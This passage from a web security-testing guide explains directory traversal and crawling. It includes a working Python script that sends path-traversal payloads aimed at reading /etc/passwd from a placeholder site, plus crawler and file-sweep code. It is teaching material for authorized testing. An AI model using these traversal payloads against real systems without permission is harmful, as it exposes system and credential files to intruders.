

Seeking Web Vulnerabilities

Attacks against unsecured websites and applications via Hypertext Transfer Protocol (HTTP) make up the majority of all Internet-related attacks. Most of these attacks can be carried out even if the HTTP traffic is encrypted (via HTTPS, that is, HTTP over SSL/TLS) because the communications medium has nothing to do with these attacks. The security vulnerabilities actually lie within the websites and applications themselves, or in the web server and browser software that the systems run on and communicate with.

Many attacks against websites and applications are just minor nuisances and might not affect sensitive information or system availability. However, some attacks can wreak havoc on your systems, putting sensitive information at risk and even placing your organization out of compliance with state, federal, and international information privacy and security laws and regulations.

Directory traversal

I start you out with a simple directory traversal attack. Directory traversal is a really basic weakness, but it can turn up interesting (and sometimes sensitive) information about a web system. This attack involves browsing a site and looking for clues about the server's directory structure and sensitive files that might have been loaded intentionally or unintentionally.
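To make the idea concrete, here is a minimal Python sketch that sends a few classic traversal payloads to a page that takes a filename parameter and flags any response that looks like a leaked system file. The target URL and the payload list are hypothetical placeholders, not a prescribed procedure; a real test would try many more encodings, depths, and target files.

import urllib.request

# Hypothetical target: a page that serves files named in a query parameter.
BASE_URL = "http://www.example.com/view?file="

# A few classic traversal payloads; real scanners try many more encodings.
PAYLOADS = [
    "../../../../etc/passwd",
    "..%2f..%2f..%2f..%2fetc/passwd",
    "....//....//....//etc/passwd",
]

for payload in PAYLOADS:
    url = BASE_URL + payload  # sent as-is, with no extra URL encoding
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            status = resp.status
            body = resp.read(4096).decode("utf-8", errors="replace")
    except Exception as exc:
        print(f"{payload}: request failed ({exc})")
        continue
    # A line starting with "root:" is a telltale sign /etc/passwd came back.
    verdict = "POSSIBLE LEAK" if "root:" in body else "no obvious leak"
    print(f"{payload}: HTTP {status}, {verdict}")

Run this only against systems you own or are explicitly authorized to test.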

Perform the following tests to determine information about your website's directory structure.

Crawlers

A spider program, such as the free HTTrack Website Copier, can crawl your site to look for every publicly accessible file. To use HTTrack, load it, give your project a name, and tell HTTrack which website(s) to mirror. After a few minutes, possibly hours (depending on the size and complexity of the site), you'll have everything that's publicly accessible on the site stored on your local drive in c:\My Web Sites. Figure 14-1 shows the crawl output of a basic website.
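HTTrack does all this through a point-and-click interface, but the underlying spidering technique is straightforward. The following is a minimal sketch of the same idea in Python, using only the standard library; the starting URL is a hypothetical placeholder. It follows links on the same host and prints every reachable resource it finds.

from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse
import urllib.request

class LinkParser(HTMLParser):
    """Collects href and src attribute values from a page."""
    def __init__(self):
        super().__init__()
        self.links = []
    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.links.append(value)

def crawl(start_url, max_pages=50):
    host = urlparse(start_url).netloc
    seen = set()
    queue = [start_url]
    while queue and len(seen) < max_pages:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        try:
            with urllib.request.urlopen(url, timeout=10) as resp:
                page = resp.read().decode("utf-8", errors="replace")
        except Exception:
            continue  # unreachable, non-HTML, or error response
        parser = LinkParser()
        parser.feed(page)
        for link in parser.links:
            absolute = urljoin(url, link).split("#")[0]
            # Stay on the target site; off-host links are ignored.
            if urlparse(absolute).netloc == host:
                queue.append(absolute)
    return sorted(seen)

if __name__ == "__main__":
    for found in crawl("http://www.example.com/"):
        print(found)

A real spider would also save the files to disk, record response codes, and handle binary content; the point here is only the crawl loop itself.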

Complicated sites often reveal more information that should not be there, including old data files and even application scripts and source code.
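Once a mirror is on disk, a quick way to triage it is to sweep the output folder for file types that usually should not be public. A minimal sketch, assuming HTTrack's default Windows output folder and a hypothetical extension list:

from pathlib import Path

# HTTrack's default output folder on Windows; adjust for your project.
MIRROR_ROOT = Path(r"C:\My Web Sites")

# Extensions that often mark old data files, scripts, or source code.
INTERESTING = {".bak", ".old", ".sql", ".zip", ".inc", ".config", ".php", ".asp", ".java", ".cs"}

for path in MIRROR_ROOT.rglob("*"):
    if path.suffix.lower() in INTERESTING:
        print(path)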
